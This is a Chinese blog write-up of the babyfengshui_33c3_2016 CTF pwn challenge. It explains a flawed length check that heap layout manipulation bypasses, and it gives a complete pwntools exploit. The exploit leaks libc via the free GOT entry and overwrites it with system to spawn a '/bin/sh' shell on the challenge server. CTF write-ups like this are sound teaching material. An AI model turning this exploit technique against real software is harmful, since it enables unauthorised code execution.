【CTF】【PWN】胎教向babyfengshui_33c3_2016题解

最新推荐文章于 2024-01-24 03:30:33 发布
最新推荐文章于 2024-01-24 03:30:33 发布
阅读量274 收藏 2
点赞数 3
分类专栏: ctf pwn reverse 文章标签: python pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_50819561/article/details/120681622
版权
ctf 同时被 3 个专栏收录
10 篇文章 0 订阅
订阅专栏
pwn
10 篇文章 2 订阅
订阅专栏
reverse
2 篇文章 0 订阅
订阅专栏

跳过checksec,我们直接分析程序。
在这里插入图片描述
我这里把这些函数命名为add,delete,display,edit。
先看add。
在这里插入图片描述
就是创建两个chunk,一个的地址存放在s里,一个的地址存放在v2里。
然后把s存在v2指向的地址里,用一个名为ptr的数组存放v2。

在这里插入图片描述
在这里插入图片描述
可以看出来,我们创建了两个chunk。按顺序命名为chunk1和chunk2.我们把这两个chunk看作是一个user的两部分。显然,chunk1存放了user的内容,chunk2存放了user的内容的地址和user的名字。
在这里插入图片描述
其中name的位置在存放内容后面4个字节。
在这里插入图片描述
然后是ptr这个数组,存放了我们创建的user的内容的地址。

在这里插入图片描述
并且每创建一个user,xxxx会加1,可以看作是一个计数器。

然后是edit。
在这里插入图片描述

在这里插入图片描述
然后通过上述函数在ptr[xxxx]这里输入text,长度为length+1。
然后是delete函数:
在这里插入图片描述
display函数可以供我们泄露got表
在这里插入图片描述

重点!
在这里插入图片描述
上述代码如何理解呢?
其实这是一个安全机制,下面根据一张图来解释一下。
在这里插入图片描述
我们首先申请了两个chunk,一个的地址存在v2(我们把他命名为content),一个的地址存在s(我们把它命名为control)。
在这里插入图片描述
然后v2这个地方的前4个字节用来存放s的地址,如上面我作的图,ptr‘指向了s。
在这里插入图片描述
然后4个字节之后的用来存放content。
在这里插入图片描述
update函数的参数实际上是heap的次序,在执行之后数量加1,但是进入update的参数是减了一的,所以相当于没有变化。
在这里插入图片描述
这里的v3指的是text的长度。 (_DWORD *)ptr[xxxx]指向的是control的首部,也就是ptr’,那么 *(_DWORD *)ptr[xxxx]就是ptr‘指向的内容,也就是content。
(char *)ptr[xxxx]-4指向的就是control的首部的地址。
那么这里的意思就是,如果content的长度加上你的text的长度超过了control的首部,就会报错,然后退出程序。
在这里插入图片描述
再把图放上来看一看
在这里插入图片描述
根据上述分析,我们不能直接填充s这一个块,使其溢出达到填充ptr’的目的。
但是,如果我们先创建两个0x80的chunk,然后将其释放。再申请一个0x100的chunk作为content,根据unsortedbin的特性,我们这个0x100的content就会申请到这两个被释放的0x80的位置。但是0x80的control还是会申请到原来的位置。如图:
在这里插入图片描述
中间会有很大一片空间。假设这一片空间大小为x.则我们可以填充x大小的内容。如下图,我们就可以通过s填充到ptr2,因为没有超过ptr ‘的位置。所以相当于绕过了他的检查。
在这里插入图片描述

代码如下:

from os import system
from pwn import *
from LibcSearcher import *

r=remote('node4.buuoj.cn','26638')
#r=process('./a')
elf=ELF('./a')
context.log_level = 'debug'
libc = ELF("./libc-2.23-32.so")
#context.terminal = ['tmux','splitw','-h']


def add(size,name,length,text):
    r.recvuntil("Action: ")
    r.sendline('0')
    r.recvuntil("size of description: ")
    r.sendline(str(size))
    r.recvuntil("name: ")
    r.sendline(str(name))
    r.recvuntil("text length: ")
    r.sendline(str(length))
    r.recvuntil("text: ")
    r.sendline(text)
def delete(idx):
    r.recvuntil("Action: ")
    r.sendline('1')
    r.recvuntil("index: ")
    r.sendline(str(idx))
def show(idx):
    r.recvuntil("Action: ")
    r.sendline('2')
    r.recvuntil("index: ")
    r.sendline(str(idx))
def edit(idx,length,text):
    r.recvuntil("Action: ")
    r.sendline('3')
    r.recvuntil("index: ")
    r.sendline(str(idx))
    r.recvuntil("text length: ")
    r.sendline(str(length))
    r.recvuntil("text: ")
    r.sendline(text)

printf_libc=libc.sym['printf']
system_libc=libc.sym['system']
free_libc=libc.sym['free']
free_got=elf.got['free']

ptr=0x804b080

add(0x80,'qianlei',0x10,'aaaaaa')#0
add(0x30,'qianlei',0x8,'aaaaaa')#1
delete(0)
add(0x100,'qianlei',0x80,'aaaaaa')#2
add(0x10,'qianlei',0x10,'/bin/sh\x00')
payload='a'*0x148+p32(free_got)
edit(2,0x150,payload)
show(1)
r.recvuntil("description: ")
free_addr=u32(r.recv(4))
print(hex(free_addr))

#gdb.attach(r)

offset=free_addr-free_libc
system_addr=system_libc+offset
edit(1,0x8,p32(system_addr))
#gdb.attach(r)

delete(3)


r.interactive()
永远在深夜里就好了
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
get_started_3dsctf_2016|get_started_3dsctf_2016
12-11
网络安全逆向PWN题目,简单的栈溢出,虽然有后门函数,但同时又给了一定的限制条件,可以使用更复杂的ROP解法。该样本题解:https://blog.csdn.net/A951860555/article/details/111030289
pwn_debug:旨在帮助快速构建对CTF Pwn游戏的利用
05-14
pwn_debug-基于pwntools的ctf pwns的辅助调试工具 建议您在获得“用法和安装”的完整说明。 这只是一个简单的描述。 入门 安装pwn_debug git clone https://github.com/ray-cp/pwn_debug.git cd pwn_debug sudo ...
babyfengshui 堆溢出的入门题
qq_41071646的博客
02-11 1693
本文 参考资料 https://github.com/firmianay/CTF-All-In-One 感谢 作者的 无私奉献 若是侵权 请联系 本人 本人会修改或删除 这道题 其实我也是看这篇文章才撸会的 怎么说呢 这个题 本来 我也是有点迷糊的 补了一些 堆溢出的资料 就懂了许多 这里我是结合资料 来写的 本人也是一个菜虾 要是哪里不对 还请指教 ...
BUUCTF pwn babyfengshui_33c3_2016(简单堆)
菜的只能随便写写博客
02-17 1991
0x01 文件分析   0x02 运行  程序提供了几个简单的功能,增删改查都有。运行的时候程序有定时机制,可以用IDA的patch功能修改二进制指令,消除定时。   0x03 静态分析 主函数: void __cdecl __noreturn main() { char v0; // [esp+3h] [ebp-15h] int v1; // [esp+4h] [ebp-14h] ...
[BUUCTF]PWN——babyfengshui_33c3_2016
mcmuyanga的博客
01-02 583
babyfengshui_33c3_2016 附件 步骤: 例行检查,32位程序,开启了cannary和nx 本地运行一下看看大概的情况,熟悉的堆的菜单布局 32位ida载入,看main函数 add update delete display 上面看到了update在判断长度的时候存在问题,它的长度判断根据是:以chunk0来说,以chunk0的地址加上chunk0的长度是否等于chunk0name的地址来判断的,但是,有一个问题就是,chunk0和chunk0(name)其实不一定是相邻的
babyfengshui_33c3_2016
m0sway的博客
12-28 1417
babyfengshui_33c3_2016 使用checksec查看: 开启了Canary和栈不可执行,看题目像是一道heap题目。 放进IDA中查看: void __cdecl __noreturn main() { char v0; // [esp+3h] [ebp-15h] int v1; // [esp+4h] [ebp-14h] size_t v2; // [esp+8h] [ebp-10h] unsigned int v3; // [esp+Ch] [ebp-Ch] v
buuctf-babyfengshui_33c3_2016
weixin_48807177的博客
05-04 642
ubuntu16 Arch: i386-32-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x8048000) //没开 基本就这里有点问题 if ( (char *)(v3 + *(_DWORD *)ptr[a1]) >= (char *)ptr[a1] - 4 ) 而重点则是在ed...
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
ctf脚本_ctfpy脚本_ctf跑脚本_ctf_ctf脚本密码_
09-30
ctf 密码学 脚本 合集 非常 nice
welpwn::sparkling_heart:CTFpwn框架
02-04
介绍修剪是一门艺术。 welpwn旨在制作艺术品,使您摆脱数十种毫无意义的工作。产品特点自动为您获取那些魔术值。 libc address heap address stack address program address (带有PIE ) canary 支持多glibc调试。...
buuctf babyfengshui_33c3_2016
weixin_45677731的博客
08-19 389
这是四个主要的函数: add函数: add函数的输入部分: 同时,这也是update函数,其实这个函数是有溢出的漏洞的,它对于长度的检查是有问题的,后面就会利用到这一点 delete函数: display函数: 先随意创建几个chunk,看看布局, add(0x80,"nam1",0x80,"aaaa") add(0x80,"nam2",0x80,"bbbb") add(0x80,"nam3",0x80,"cccc") 以第一个为例,储存text的chunk在前,后面是储存name的chunk,
babyfengshui_33c3_2016 -- house of spirit
huzai9527的博客
03-17 110
本题主要就是看懂一条判断溢出的if语句 结构体是怎么看出来的 代码上看 struct{ char *text; char name[124]; } 从内存上看 思路 step4 的关于408哪里来的 看内存地址,计算chunk3的content到chunk1的struct即可 exp from pwn import * p = remote('node3.buuoj.cn',29853) #p = process('./babyfengshui_33c3_20
babyfengshui_33c3_2016题解
coco的博客
12-09 891
这道题还是比较基础的堆题,泄漏libc和get shell都比较基础。需要注意的是以下几点: 输入长度限制的绕过方法值得学习一下。 泄漏libc时将free got表中写入puts.plt是不可行的,因为这道题的输入结束时候会带上\x00,这样就会破坏free got表的下一项fgets got,导致程序运行失败。 我最后本机上运行成功,但是远程打不通,后来经过发现是因为libc的版本不一样,导...
babyfengshui_33c3_2016[堆溢出]
、moddemod
06-26 343
未来的你 = 你的热情 + 你的努力 + 那么微不足道的天赋 其实做pwn题我感觉都是只可意会,但并非不可言传,只是说了感觉和说废话一样,没有什么实质性的作用,最最重要的是要自己多去操作调试,pwn多了也就那样吧!但是最核心的永远是你coding的能力!虽然在干着逆向的事,但是coding的能力决定了你的高度! ----小白感悟 这道题问题出现在更新的时候边界的判断方法有问题,结合的堆的机制,就可以形成堆溢出! 添加一个用户会申请两个chunk,后一个chunk的内容为.
【buu】babyfengshui_33c3_2016(详细题解
qq_62068476的博客
03-15 292
buu日常一题
babyfengshui_33c3_2016的wp
wuyvle的博客
03-05 146
这是个相当好的堆题 add函数 可以看出这是个结构体 struct Node{ char * description; char name[0x7C]; } s便是description的空间地址,而v2则是结构体的空间。 delete函数 display update 这里限制了输入的长度 对于chunk0来说,就是0x80c008+输入长度是否大于0x804c08c,但是,有一个问题就是,chunk0和chunk0(name)其实不一定是相邻的,这样的话就有了实现溢出的可能 add(0x8
[BUUCTF]-PWN:babyfengshui_33c3_2016解析
最新发布
2301_79326813的博客
01-24 635
又是一道堆题,先看保护关键信息是32位,没开pie直接看ida大致是alloc创建堆块,free释放堆块,show查看堆块内容,fill填充堆块内容其他的都没啥关键的要讲,但alloc那里非常需要解析一下解释如上图再具体一点就是 我们输入的字节大小+堆块地址>=相邻0x80堆块的地址时会被强制退出必须要 我们输入的字节大小+堆块地址
(攻防世界)(pwnbabyfengshui
PLpa的博客
08-03 1291
入门级的堆题,拿来学习还是不错的。 做这道题之前,最好还是先对堆的数据结构有一定的了解。 拿到题目,下载附件,查看保护。 一个32位的程序,开了NX和Canary保护,这都不是重头戏毕竟这题不用栈,栈保护只是锦上添花罢了。 把文件拖进IDA查看逻辑: 可以看到,典型的菜单题,这很pwn,实现了增删改查四个功能,像极了C语言程序设计的期末结业程序设计题哈哈哈,暴露年龄。 进入增加用户功能: 可...
ctf题目Web_php_include
07-28
- *2* *3* [ctf web 文件包含漏洞(例题)](https://blog.csdn.net/weixin_49298265/article/details/110356100)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值